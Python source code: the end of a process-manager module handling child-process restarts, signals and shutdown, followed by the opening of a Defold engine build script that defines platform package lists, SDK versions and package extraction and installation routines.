if type(multiprocessing.Process) is type(tgt) and issubclass(tgt, multiprocessing.Process):
process = tgt(*args, **kwargs)
else:
process = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs, name=name)
if isinstance(process, SignalHandlingMultiprocessingProcess):
with default_signals(signal.SIGINT, signal.SIGTERM):
process.start()
else:
process.start()
log.debug("Started '{0}' with pid {1}".format(name, process.pid))
self._process_map[process.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': process}
return process
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
if self._restart_processes is False:
return
log.info('Process {0} ({1}) died with exit status {2},'
' restarting...'.format(self._process_map[pid]['tgt'],
pid,
self._process_map[pid]['Process'].exitcode))
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def stop_restarting(self):
self._restart_processes = False
def send_signal_to_processes(self, signal_):
if (salt.utils.is_windows() and
signal_ in (signal.SIGTERM, signal.SIGINT)):
# On Windows, the subprocesses automatically have their signal
# handlers invoked. If you send one of these signals while the
# signal handler is running, it will kill the process where it
# is currently running and the signal handler will not finish.
# This will also break the process tree: children of killed
# children will become parentless and not findable when trying
# to kill the process tree (they don't inherit their parent's
# parent). Hence the 'MWorker' processes would be left over if
# the 'ReqServer' process is killed this way since 'taskkill'
# with the tree option will not be able to find them.
return
for pid in six.iterkeys(self._process_map.copy()):
try:
os.kill(pid, signal_)
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
# If it's not a "No such process" error, raise it
raise
# Otherwise, it's a dead process, remove it from the process map
del self._process_map[pid]
@gen.coroutine
def run(self, async=False):
'''
Load and start all available api modules
'''
log.debug('Process Manager starting!')
salt.utils.appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# There are not SIGTERM handlers installed, install ours
signal.signal(signal.SIGTERM, self.kill_children)
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# There are not SIGTERM handlers installed, install ours
signal.signal(signal.SIGINT, self.kill_children)
while True:
log.trace('Process manager iteration')
try:
# in case someone died while we were waiting...
self.check_children()
if not salt.utils.is_windows() and not async:
pid, exit_status = os.wait()
if pid not in self._process_map:
log.debug('Process of pid {0} died, not a known'
' process, will not restart'.format(pid))
continue
if self._restart_processes is True:
self.restart_process(pid)
elif async is True:
yield gen.sleep(10)
elif async is False:
# os.wait() is not supported on Windows.
time.sleep(10)
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
except IOError as exc:
# IOError with errno of EINTR (4) may be raised
# when using time.sleep() on Windows.
if exc.errno != errno.EINTR:
raise
break
def check_children(self):
'''
Check the children once
'''
if self._restart_processes is True:
for pid, mapping in six.iteritems(self._process_map):
if not mapping['Process'].is_alive():
self.restart_process(pid)
def kill_children(self, *args, **kwargs):
'''
Kill all of the children
'''
# check that this is the correct process, children inherit this
# handler, if we are in a child lets just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
if salt.utils.is_windows():
if multiprocessing.current_process().name != 'MainProcess':
# Since the main process will kill subprocesses by tree,
# no need to do anything in the subprocesses.
# Sometimes, when both a subprocess and the main process
# call 'taskkill', it will leave a 'taskkill' zombie process.
# We want to avoid this.
return
with salt.utils.fopen(os.devnull, 'wb') as devnull:
for pid, p_map in six.iteritems(self._process_map):
# On Windows, we need to explicitly terminate sub-processes
# because the processes don't have a sigterm handler.
subprocess.call(
['taskkill', '/F', '/T', '/PID', str(pid)],
stdout=devnull, stderr=devnull
)
p_map['Process'].terminate()
else:
for pid, p_map in six.iteritems(self._process_map.copy()):
log.trace('Terminating pid {0}: {1}'.format(pid, p_map['Process']))
if args:
# escalate the signal to the process
os.kill(pid, args[0])
try:
p_map['Process'].terminate()
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
raise
if not p_map['Process'].is_alive():
try:
del self._process_map[pid]
except KeyError:
# Race condition
pass
end_time = time.time() + self.wait_for_kill # when to die
log.trace('Waiting to kill process manager children')
while self._process_map and time.time() < end_time:
for pid, p_map in six.iteritems(self._process_map.copy()):
log.trace('Joining pid {0}: {1}'.format(pid, p_map['Process']))
p_map['Process'].join(0)
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
# if any managed processes still remain to be handled, let's kill them
kill_iterations = 2
while kill_iterations >= 0:
kill_iterations -= 1
for pid, p_map in six.iteritems(self._process_map.copy()):
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
continue
log.trace('Killing pid {0}: {1}'.format(pid, p_map['Process']))
try:
os.kill(signal.SIGKILL, pid)
except OSError:
# in case the process has since decided to die, os.kill returns OSError
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
if self._process_map:
# Some processes disrespected the KILL signal!!!!
available_retries = kwargs.get('retry', 3)
if available_retries >= 0:
log.info(
'Some processes failed to respect the KILL signal: %s',
'; '.join(
'Process: {0} (Pid: {1})'.format(v['Process'], k) for
(k, v) in self._process_map.items()
)
)
log.info('kill_children retries left: %s', available_retries)
kwargs['retry'] = available_retries - 1
return self.kill_children(*args, **kwargs)
else:
log.warning(
'Failed to kill the following processes: %s',
'; '.join(
'Process: {0} (Pid: {1})'.format(v['Process'], k) for
(k, v) in self._process_map.items()
)
)
log.warning(
'Salt will either fail to terminate now or leave some '
'zombie processes behind'
)
class MultiprocessingProcess(multiprocessing.Process, NewStyleClassMixIn):
def __new__(cls, *args, **kwargs):
instance = super(MultiprocessingProcess, cls).__new__(cls)
# Patch the run method at runtime because decorating the run method
# with a function with a similar behavior would be ignored once this
# class'es run method is overridden.
instance._original_run = instance.run
instance.run = instance._run
return instance
def __init__(self, *args, **kwargs):
if (salt.utils.is_windows() and
not hasattr(self, '_is_child') and
self.__setstate__.__code__ is
MultiprocessingProcess.__setstate__.__code__):
# On Windows, if a derived class hasn't defined __setstate__, that
# means the 'MultiprocessingProcess' version will be used. For this
# version, save a copy of the args and kwargs to use with its
# __setstate__ and __getstate__.
# We do this so that __init__ will be invoked on Windows in the
# child process so that a register_after_fork() equivalent will
# work on Windows. Note that this will only work if the derived
# class uses the exact same args and kwargs as this class. Hence
# this will also work for 'SignalHandlingMultiprocessingProcess'.
# However, many derived classes take params that they don't pass
# down (eg opts). Those classes need to override __setstate__ and
# __getstate__ themselves.
self._args_for_getstate = copy.copy(args)
self._kwargs_for_getstate = copy.copy(kwargs)
self.log_queue = kwargs.pop('log_queue', None)
if self.log_queue is None:
self.log_queue = salt.log.setup.get_multiprocessing_logging_queue()
else:
# Set the logging queue so that it can be retrieved later with
# salt.log.setup.get_multiprocessing_logging_queue().
salt.log.setup.set_multiprocessing_logging_queue(self.log_queue)
# Call __init__ from 'multiprocessing.Process' only after removing
# 'log_queue' from kwargs.
super(MultiprocessingProcess, self).__init__(*args, **kwargs)
if salt.utils.is_windows():
# On Windows, the multiprocessing.Process object is reinitialized
# in the child process via the constructor. Due to this, methods
# such as ident() and is_alive() won't work properly. So we use
# our own creation '_is_child' for this purpose.
if hasattr(self, '_is_child'):
# On Windows, no need to call register_after_fork().
# register_after_fork() would only work on Windows if called
# from the child process anyway. Since we know this is the
# child process, call __setup_process_logging() directly.
self.__setup_process_logging()
multiprocessing.util.Finalize(
self,
salt.log.setup.shutdown_multiprocessing_logging,
exitpriority=16
)
else:
multiprocessing.util.register_after_fork(
self,
MultiprocessingProcess.__setup_process_logging
)
multiprocessing.util.Finalize(
self,
salt.log.setup.shutdown_multiprocessing_logging,
exitpriority=16
)
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
args = state['args']
kwargs = state['kwargs']
# This will invoke __init__ of the most derived class.
self.__init__(*args, **kwargs)
def __getstate__(self):
args = self._args_for_getstate
kwargs = self._kwargs_for_getstate
if 'log_queue' not in kwargs:
kwargs['log_queue'] = self.log_queue
# Remove the version of these in the parent process since
# they are no longer needed.
del self._args_for_getstate
del self._kwargs_for_getstate
return {'args': args,
'kwargs': kwargs}
def __setup_process_logging(self):
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
def _run(self):
try:
return self._original_run()
except SystemExit:
# These are handled by multiprocessing.Process._bootstrap()
raise
except Exception as exc:
log.error(
'An un-handled exception from the multiprocessing process '
'\'%s\' was caught:\n', self.name, exc_info=True)
# Re-raise the exception. multiprocessing.Process will write it to
# sys.stderr and set the proper exitcode and we have already logged
# it above.
raise
class SignalHandlingMultiprocessingProcess(MultiprocessingProcess):
def __init__(self, *args, **kwargs):
super(SignalHandlingMultiprocessingProcess, self).__init__(*args, **kwargs)
if salt.utils.is_windows():
if hasattr(self, '_is_child'):
# On Windows, no need to call register_after_fork().
# register_after_fork() would only work on Windows if called
# from the child process anyway. Since we know this is the
# child process, call __setup_signals() directly.
self.__setup_signals()
else:
multiprocessing.util.register_after_fork(
self,
SignalHandlingMultiprocessingProcess.__setup_signals
)
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
msg = '{0} received a '.format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += 'SIGINT'
elif signum == signal.SIGTERM:
msg += 'SIGTERM'
msg += '. Exiting'
log.debug(msg)
sys.exit(salt.defaults.exitcodes.EX_OK)
def start(self):
with default_signals(signal.SIGINT, signal.SIGTERM):
super(SignalHandlingMultiprocessingProcess, self).start()
@contextlib.contextmanager
def default_signals(*signals):
old_signals = {}
for signum in signals:
old_signals[signum] = signal.getsignal(signum)
signal.signal(signum, signal.SIG_DFL)
# Do whatever is needed with the reset signals
yield
# Restore signals
for signum in old_signals:
signal.signal(signum, old_signals[signum])
del old_signals
|
build.py
|
#!/usr/bin/env python
# Copyright 2020 The Defold Foundation
# Licensed under the Defold License version 1.0 (the "License"); you may not use
# this file except in compliance with the License.
#
# You may obtain a copy of the License, together with FAQs at
# https://www.defold.com/license
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
# add build_tools folder to the import search path
import sys, os
from os.path import join, dirname, basename, relpath, expanduser, normpath, abspath
sys.path.append(os.path.join(normpath(join(dirname(abspath(__file__)), '..')), "build_tools"))
import shutil, zipfile, re, itertools, json, platform, math, mimetypes
import optparse, subprocess, urllib, urlparse, tempfile, time
import imp
import github
import run
import s3
import release_to_github
import BuildUtility
import http_cache
from tarfile import TarFile
from glob import glob
from threading import Thread, Event
from Queue import Queue
from ConfigParser import ConfigParser
BASE_PLATFORMS = [ 'x86_64-linux',
'x86_64-darwin',
'win32', 'x86_64-win32',
'x86_64-ios', 'armv7-darwin', 'arm64-darwin',
'armv7-android', 'arm64-android',
'js-web', 'wasm-web']
sys.dont_write_bytecode = True
try:
import build_nx64
sys.modules['build_private'] = build_nx64
except Exception, e:
pass
sys.dont_write_bytecode = False
try:
import build_private
except Exception, e:
pass
if 'build_private' not in sys.modules:
class build_private(object):
@classmethod
def get_target_platforms(cls):
return []
@classmethod
def get_install_host_packages(cls, platform): # Returns the packages that should be installed for the host
return []
@classmethod
def get_install_target_packages(cls, platform): # Returns the packages that should be installed for the target
return []
@classmethod
def install_sdk(cls, configuration, platform): # Installs the sdk for the private platform
pass
@classmethod
def is_library_supported(cls, platform, library):
return True
@classmethod
def is_repo_private(self):
return False
@classmethod
def get_tag_suffix(self):
return ''
def get_target_platforms():
return BASE_PLATFORMS + build_private.get_target_platforms()
PACKAGES_ALL="protobuf-2.3.0 waf-1.5.9 junit-4.6 protobuf-java-2.3.0 openal-1.1 maven-3.0.1 ant-1.9.3 vecmath vpx-1.7.0 luajit-2.1.0-beta3 tremolo-0.0.8 defold-robot-0.7.0 bullet-2.77 libunwind-395b27b68c5453222378bc5fe4dab4c6db89816a jctest-0.8 vulkan-1.1.108".split()
PACKAGES_HOST="protobuf-2.3.0 cg-3.1 vpx-1.7.0 luajit-2.1.0-beta3 tremolo-0.0.8".split()
PACKAGES_IOS_X86_64="protobuf-2.3.0 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77".split()
PACKAGES_IOS="protobuf-2.3.0 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77".split()
PACKAGES_IOS_64="protobuf-2.3.0 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 MoltenVK-1.0.41".split()
PACKAGES_DARWIN="protobuf-2.3.0 vpx-1.7.0".split()
PACKAGES_DARWIN_64="protobuf-2.3.0 luajit-2.1.0-beta3 vpx-1.7.0 tremolo-0.0.8 sassc-5472db213ec223a67482df2226622be372921847 bullet-2.77 spirv-cross-2018-08-07 glslc-v2018.0 MoltenVK-1.0.41".split()
PACKAGES_WIN32="luajit-2.1.0-beta3 openal-1.1 glut-3.7.6 bullet-2.77 vulkan-1.1.108".split()
PACKAGES_WIN32_64="luajit-2.1.0-beta3 openal-1.1 glut-3.7.6 sassc-5472db213ec223a67482df2226622be372921847 bullet-2.77 spirv-cross-2018-08-07 glslc-v2018.0 vulkan-1.1.108".split()
PACKAGES_LINUX_64="luajit-2.1.0-beta3 sassc-5472db213ec223a67482df2226622be372921847 bullet-2.77 spirv-cross-2018-08-07 glslc-v2018.0 vulkan-1.1.108".split()
PACKAGES_ANDROID="protobuf-2.3.0 android-support-multidex androidx-multidex android-28 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 libunwind-8ba86320a71bcdc7b411070c0c0f101cf2131cf2".split()
PACKAGES_ANDROID_64="protobuf-2.3.0 android-support-multidex androidx-multidex android-28 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 libunwind-8ba86320a71bcdc7b411070c0c0f101cf2131cf2".split()
PACKAGES_EMSCRIPTEN="protobuf-2.3.0 bullet-2.77".split()
PACKAGES_NODE_MODULES="xhr2-0.1.0".split()
DMSDK_PACKAGES_ALL="vectormathlibrary-r1649".split()
CDN_PACKAGES_URL=os.environ.get("DM_PACKAGES_URL", None)
DEFAULT_ARCHIVE_DOMAIN=os.environ.get("DM_ARCHIVE_DOMAIN", "d.defold.com")
DEFAULT_RELEASE_REPOSITORY=os.environ.get("DM_RELEASE_REPOSITORY") if os.environ.get("DM_RELEASE_REPOSITORY") else release_to_github.get_current_repo()
PACKAGES_IOS_SDK="iPhoneOS14.5.sdk"
PACKAGES_IOS_SIMULATOR_SDK="iPhoneSimulator14.5.sdk"
PACKAGES_MACOS_SDK="MacOSX11.3.sdk"
PACKAGES_XCODE_TOOLCHAIN="XcodeDefault12.5.xctoolchain"
PACKAGES_TAPI_VERSION="tapi1.6"
WINDOWS_SDK_10_VERSION="10.0.18362.0"
WINDOWS_MSVC_2019_VERSION="14.25.28610"
PACKAGES_WIN32_TOOLCHAIN="Microsoft-Visual-Studio-2019-{0}".format(WINDOWS_MSVC_2019_VERSION)
PACKAGES_WIN32_SDK_10="WindowsKits-{0}".format(WINDOWS_SDK_10_VERSION)
PACKAGES_NODE_MODULE_XHR2="xhr2-v0.1.0"
PACKAGES_ANDROID_NDK="android-ndk-r20"
PACKAGES_ANDROID_SDK="android-sdk"
PACKAGES_LINUX_CLANG="clang-9.0.0"
PACKAGES_LINUX_TOOLCHAIN="clang+llvm-9.0.0-x86_64-linux-gnu-ubuntu-16.04"
PACKAGES_CCTOOLS_PORT="cctools-port-darwin19-6c438753d2252274678d3e0839270045698c159b-linux"
NODE_MODULE_LIB_DIR = os.path.join("ext", "lib", "node_modules")
EMSCRIPTEN_VERSION_STR = "2.0.11"
EMSCRIPTEN_SDK = "sdk-{0}-64bit".format(EMSCRIPTEN_VERSION_STR)
PACKAGES_EMSCRIPTEN_SDK="emsdk-{0}".format(EMSCRIPTEN_VERSION_STR)
SHELL = os.environ.get('SHELL', 'bash')
# Don't use WSL from the msys/cygwin terminal
if os.environ.get('TERM','') in ('cygwin',):
if 'WD' in os.environ:
SHELL= '%s\\bash.exe' % os.environ['WD'] # the binary directory
ENGINE_LIBS = "testmain ddf particle glfw graphics lua hid input physics resource extension script render rig gameobject gui sound liveupdate crash gamesys tools record iap push iac webview profiler facebook engine sdk".split()
EXTERNAL_LIBS = "bullet3d".split()
def is_64bit_machine():
return platform.machine().endswith('64')
# Legacy format, should be removed eventually
# Returns: [linux|x86_64-linux|win32|x86_64-win32|darwin]
def get_host_platform():
if sys.platform == 'linux2':
arch = platform.architecture()[0]
if arch == '64bit':
return 'x86_64-linux'
else:
return 'linux'
elif sys.platform == 'win32' and is_64bit_machine():
return 'x86_64-win32'
else:
return sys.platform
# The difference from get_host_platform is that it returns the correct platform
# Returns: [x86|x86_64][win32|linux|darwin]
def get_host_platform2():
if sys.platform == 'linux2':
arch = platform.architecture()[0]
if arch == '64bit':
return 'x86_64-linux'
else:
return 'x86-linux'
elif sys.platform == 'win32':
if is_64bit_machine():
return 'x86_64-win32'
else:
return 'x86-win32'
elif sys.platform == 'darwin':
if is_64bit_machine():
return 'x86_64-darwin'
else:
return 'x86-darwin'
else:
raise Exception("Unknown host platform: %s" % sys.platform)
def format_exes(name, platform):
prefix = ''
suffix = ['']
if 'win32' in platform:
suffix = ['.exe']
elif 'android' in platform:
prefix = 'lib'
suffix = ['.so']
elif 'js-web' in platform:
prefix = ''
suffix = ['.js']
elif 'wasm-web' in platform:
prefix = ''
suffix = ['.js', '.wasm']
elif platform in ['arm64-nx64']:
prefix = ''
suffix = ['.nss', '.nso']
else:
suffix = ['']
exes = []
for suff in suffix:
exes.append('%s%s%s' % (prefix, name, suff))
return exes
def format_lib(name, platform):
prefix = 'lib'
suffix = ''
if 'darwin' in platform or 'ios' in platform:
suffix = '.dylib'
elif 'win32' in platform:
prefix = ''
suffix = '.dll'
else:
suffix = '.so'
return '%s%s%s' % (prefix, name, suffix)
class ThreadPool(object):
def __init__(self, worker_count):
self.workers = []
self.work_queue = Queue()
for i in range(worker_count):
w = Thread(target = self.worker)
w.setDaemon(True)
w.start()
self.workers.append(w)
def worker(self):
func, args, future = self.work_queue.get()
while func:
try:
result = func(*args)
future.result = result
except Exception,e:
future.result = e
future.event.set()
func, args, future = self.work_queue.get()
class Future(object):
def __init__(self, pool, f, *args):
self.result = None
self.event = Event()
pool.work_queue.put([f, args, self])
def __call__(self):
try:
# In order to respond to ctrl+c wait with timeout...
while not self.event.is_set():
self.event.wait(0.1)
except KeyboardInterrupt,e:
sys.exit(0)
if isinstance(self.result, Exception):
raise self.result
else:
return self.result
def download_sdk(conf, url, targetfolder, strip_components=1, force_extract=False, format='z'):
if not os.path.exists(targetfolder) or force_extract:
if not os.path.exists(os.path.dirname(targetfolder)):
os.makedirs(os.path.dirname(targetfolder))
path = conf.get_local_or_remote_file(url)
conf._extract_tgz_rename_folder(path, targetfolder, strip_components, format=format)
else:
print "SDK already installed:", targetfolder
class Configuration(object):
def __init__(self, dynamo_home = None,
target_platform = None,
skip_tests = False,
skip_codesign = False,
skip_docs = False,
skip_builtins = False,
skip_bob_light = False,
disable_ccache = False,
no_colors = False,
archive_domain = None,
package_path = None,
set_version = None,
channel = None,
engine_artifacts = None,
waf_options = [],
save_env_path = None,
notarization_username = None,
notarization_password = None,
notarization_itc_provider = None,
github_token = None,
github_target_repo = None,
github_sha1 = None,
version = None,
codesigning_identity = None,
windows_cert = None,
windows_cert_pass = None,
verbose = False):
if sys.platform == 'win32':
home = os.environ['USERPROFILE']
else:
home = os.environ['HOME']
self.dynamo_home = dynamo_home if dynamo_home else join(os.getcwd(), 'tmp', 'dynamo_home')
self.ext = join(self.dynamo_home, 'ext')
self.dmsdk = join(self.dynamo_home, 'sdk')
self.defold = normpath(join(dirname(abspath(__file__)), '..'))
self.defold_root = os.getcwd()
self.host = get_host_platform()
self.host2 = get_host_platform2()
self.target_platform = target_platform
self.build_utility = BuildUtility.BuildUtility(self.target_platform, self.host, self.dynamo_home)
self.skip_tests = skip_tests
self.skip_codesign = skip_codesign
self.skip_docs = skip_docs
self.skip_builtins = skip_builtins
self.skip_bob_light = skip_bob_light
self.disable_ccache = disable_ccache
self.no_colors = no_colors
self.archive_path = "s3://%s/archive" % (archive_domain)
self.archive_domain = archive_domain
self.package_path = package_path
self.set_version = set_version
self.channel = channel
self.engine_artifacts = engine_artifacts
self.waf_options = waf_options
self.save_env_path = save_env_path
self.notarization_username = notarization_username
self.notarization_password = notarization_password
self.notarization_itc_provider = notarization_itc_provider
self.github_token = github_token
self.github_target_repo = github_target_repo
self.github_sha1 = github_sha1
self.version = version
self.codesigning_identity = codesigning_identity
self.windows_cert = windows_cert
self.windows_cert_pass = windows_cert_pass
self.verbose = verbose
if self.github_token is None:
self.github_token = os.environ.get("GITHUB_TOKEN")
self.thread_pool = None
self.futures = []
if version is None:
with open('VERSION', 'r') as f:
self.version = f.readlines()[0].strip()
self._create_common_dirs()
def __del__(self):
if len(self.futures) > 0:
print('ERROR: Pending futures (%d)' % len(self.futures))
os._exit(5)
def _create_common_dirs(self):
for p in ['ext/lib/python', 'share', 'lib/js-web/js', 'lib/wasm-web/js']:
self._mkdirs(join(self.dynamo_home, p))
def _mkdirs(self, path):
if not os.path.exists(path):
os.makedirs(path)
def _log(self, msg):
print msg
sys.stdout.flush()
sys.stderr.flush()
def distclean(self):
if os.path.exists(self.dynamo_home):
self._log('Removing %s' % self.dynamo_home)
shutil.rmtree(self.dynamo_home)
for lib in ['dlib','texc']+ENGINE_LIBS:
builddir = join(self.defold_root, 'engine/%s/build' % lib)
if os.path.exists(builddir):
self._log('Removing %s' % builddir)
shutil.rmtree(builddir)
# Recreate dirs
self._create_common_dirs()
self._log('distclean done.')
def _extract_tgz(self, file, path):
self._log('Extracting %s to %s' % (file, path))
version = sys.version_info
suffix = os.path.splitext(file)[1]
# Avoid a bug in python 2.7 (fixed in 2.7.2) related to not being able to remove symlinks: http://bugs.python.org/issue10761
if self.host == 'x86_64-linux' and version[0] == 2 and version[1] == 7 and version[2] < 2:
fmts = {'.gz': 'z', '.xz': 'J', '.bzip2': 'j'}
run.env_command(self._form_env(), ['tar', 'xf%s' % fmts.get(suffix, 'z'), file], cwd = path)
else:
fmts = {'.gz': 'gz', '.xz': 'xz', '.bzip2': 'bz2'}
tf = TarFile.open(file, 'r:%s' % fmts.get(suffix, 'gz'))
tf.extractall(path)
tf.close()
def _extract_tgz_rename_folder(self, src, target_folder, strip_components=1, format=None):
src = src.replace('\\', '/')
force_local = ''
if os.environ.get('GITHUB_SHA', None) is not None and os.environ.get('TERM', '') == 'cygwin':
force_local = '--force-local' # to make tar not try to "connect" because it found a colon in the source file
self._log('Extracting %s to %s/' % (src, target_folder))
parentdir, dirname = os.path.split(target_folder)
old_dir = os.getcwd()
os.chdir(parentdir)
if not os.path.exists(dirname):
os.makedirs(dirname)
if format is None:
suffix = os.path.splitext(src)[1]
fmts = {'.gz': 'z', '.xz': 'J', '.bzip2': 'j'}
format = fmts.get(suffix, 'z')
cmd = ['tar', 'xf%s' % format, src, '-C', dirname]
if strip_components:
cmd.extend(['--strip-components', '%d' % strip_components])
if force_local:
cmd.append(force_local)
run.env_command(self._form_env(), cmd)
os.chdir(old_dir)
def _extract_zip(self, file, path):
self._log('Extracting %s to %s' % (file, path))
def _extract_zip_entry( zf, info, extract_dir ):
zf.extract( info.filename, path=extract_dir )
out_path = os.path.join( extract_dir, info.filename )
perm = info.external_attr >> 16L
os.chmod( out_path, perm )
with zipfile.ZipFile(file, 'r') as zf:
for info in zf.infolist():
_extract_zip_entry( zf, info, path )
def _extract(self, file, path):
if os.path.splitext(file)[1] == '.zip':
self._extract_zip(file, path)
else:
self._extract_tgz(file, path)
def _copy(self, src, dst):
self._log('Copying %s -> %s' % (src, dst))
shutil.copy(src, dst)
def _copy_tree(self, src, dst):
self._log('Copying %s -> %s' % (src, dst))
shutil.copytree(src, dst)
def _download(self, url):
self._log('Downloading %s' % (url))
path = http_cache.download(url, lambda count, total: self._log('Downloading %s %.2f%%' % (url, 100 * count / float(total))))
if not path:
self._log('Downloading %s failed' % (url))
return path
def _check_package_path(self):
if self.package_path is None:
print("No package path provided. Use either --package-path option or DM_PACKAGES_URL environment variable")
sys.exit(1)
def install_ext(self):
def make_package_path(root, platform, package):
return join(root, 'packages', package) + '-%s.tar.gz' % platform
def make_package_paths(root, platform, packages):
return [make_package_path(root, platform, package) for package in packages]
self._check_package_path()
print("Installing common packages")
for p in PACKAGES_ALL:
self._extract_tgz(make_package_path(self.defold_root, 'common', p), self.ext)
for p in DMSDK_PACKAGES_ALL:
self._extract_tgz(make_package_path(self.defold_root, 'common', p), self.dmsdk)
# TODO: Make sure the order of install does not affect the outcome!
platform_packages = {
'win32': PACKAGES_WIN32,
'x86_64-win32': PACKAGES_WIN32_64,
'x86_64-linux': PACKAGES_LINUX_64,
'darwin': PACKAGES_DARWIN, # ?? Still used by bob-light?
'x86_64-darwin': PACKAGES_DARWIN_64,
'armv7-darwin': PACKAGES_IOS,
'arm64-darwin': PACKAGES_IOS_64,
'x86_64-ios': PACKAGES_IOS_X86_64,
'armv7-android': PACKAGES_ANDROID,
'arm64-android': PACKAGES_ANDROID_64,
'js-web': PACKAGES_EMSCRIPTEN,
'wasm-web': PACKAGES_EMSCRIPTEN
}
base_platforms = self.get_base_platforms()
target_platform = self.target_platform
other_platforms = set(platform_packages.keys()).difference(set(base_platforms), set([target_platform, self.host]))
if target_platform in ['js-web', 'wasm-web']:
node_modules_dir = os.path.join(self.dynamo_home, NODE_MODULE_LIB_DIR)
for package in PACKAGES_NODE_MODULES:
path = join(self.defold_root, 'packages', package + '.tar.gz')
name = package.split('-')[0]
self._extract_tgz(path, join(node_modules_dir, name))
installed_packages = set()
for platform in other_platforms:
packages = platform_packages.get(platform, [])
package_paths = make_package_paths(self.defold_root, platform, packages)
print("Installing %s packages " % platform)
for path in package_paths:
self._extract_tgz(path, self.ext)
installed_packages.update(package_paths)
for base_platform in self.get_base_platforms():
packages = list(PACKAGES_HOST) + build_private.get_install_host_packages(base_platform)
packages.extend(platform_packages.get(base_platform, []))
package_paths = make_package_paths(self.defold_root, base_platform, packages)
package_paths = [path for path in package_paths if path not in installed_packages]
if len(package_paths) != 0:
print("Installing %s packages" % base_platform)
for path in package_paths:
self._extract_tgz(path, self.ext)
installed_packages.update(package_paths)
# For easier usage with the extender server, we want the linux protoc tool available
if target_platform in ('x86_64-darwin', 'x86_64-win32', 'x86_64-linux'):
protobuf_packages = filter(lambda x: "protobuf" in x, PACKAGES_HOST)
package_paths = make_package_paths(self.defold_root, 'x86_64-linux', protobuf_packages)
print("Installing %s packages " % 'x86_64-linux')
for path in package_paths:
self._extract_tgz(path, self.ext)
installed_packages.update(package_paths)
target_packages = platform_packages.get(self.target_platform, []) + build_private.get_install_target_packages(self.target_platform)
target_package_paths = make_package_paths(self.defold_root, self.target_platform, target_packages)
target_package_paths = [path for path in target_package_paths if path not in installed_packages]
if len(target_package_paths) != 0:
print("Installing %s packages" % self.target_platform)
for path in target_package_paths:
self._extract_tgz(path, self.ext)
installed_packages.update(target_package_paths)
print("Installing python wheels")
run.env_command(self._form_env(), ['python', './packages/get-pip.py', 'pip==19.3.1'])
run.env_command(self._form_env(), ['python', '-m', 'pip', '-q', '-q', 'install', '-t', join(self.ext, 'lib', 'python'), 'requests', 'pyaml'])
for whl in glob(join(self.defold_root, 'packages', '*.whl')):
self._log('Installing %s' % basename(whl))
run.env_command(self._form_env(), ['python', '-m', 'pip', '-q', '-q', 'install', '-t', join(self.ext, 'lib', 'python'), whl])
print("Installing javascripts")
for n in 'js-web-pre.js'.split():
self._copy(join(self.defold_root, 'share', n), join(self.dynamo_home, 'share'))
for n in 'js-web-pre-engine.js'.split():
self._copy(join(self.defold_root, 'share', n), join(self.dynamo_home, 'share'))
print("Installing profiles etc")
for n in itertools.chain(*[ glob('share/*%s' % ext) for ext in ['.mobileprovision', '.xcent', '.supp']]):
self._copy(join(self.defold_root, n), join(self.dynamo_home, 'share'))
# Simple way to reduce number of warnings in the build
proto_path = os.path.join(self.dynamo_home, 'share', 'proto')
if not os.path.exists(proto_path):
os.makedirs(proto_path)
# Note: This is a step we want to separate from install_ext
# since it should actually be before install_ext (e.g. to build the extensions)
self.install_sdk()
def get_local_or_remote_file(self, path):
if os.path.isdir(self.package_path): # is is a local path?
if os.path.exists(path):
return os.path.normpath(os.path.abspath(path))
print "Could not find local file:", path
sys.exit(1)
dirname, basename = os.path.split(path)
path = dirname + "/" + urllib.quote(basename)
path = self._download(path) # it should be an url
if path is None:
print("Error. Could not download %s" % path)
sys.exit(1)
return path
def check_sdk(self):
sdkfolder = join(self.ext, 'SDKs')
folders = []
if self.target_platform in ('x86_64-darwin', 'armv7-darwin', 'arm64-darwin', 'x86_64-ios'):
folders.append(join(sdkfolder, PACKAGES_MACOS_SDK))
folders.append(join(sdkfolder, PACKAGES_XCODE_TOOLCHAIN))
if self.target_platform in ('armv7-darwin', 'arm64-darwin', 'x86_64-ios'):
folders.append(join(sdkfolder, PACKAGES_IOS_SDK))
folders.append(join(sdkfolder, PACKAGES_IOS_SIMULATOR_SDK))
if self.target_platform in ('x86_64-win32', 'win32'):
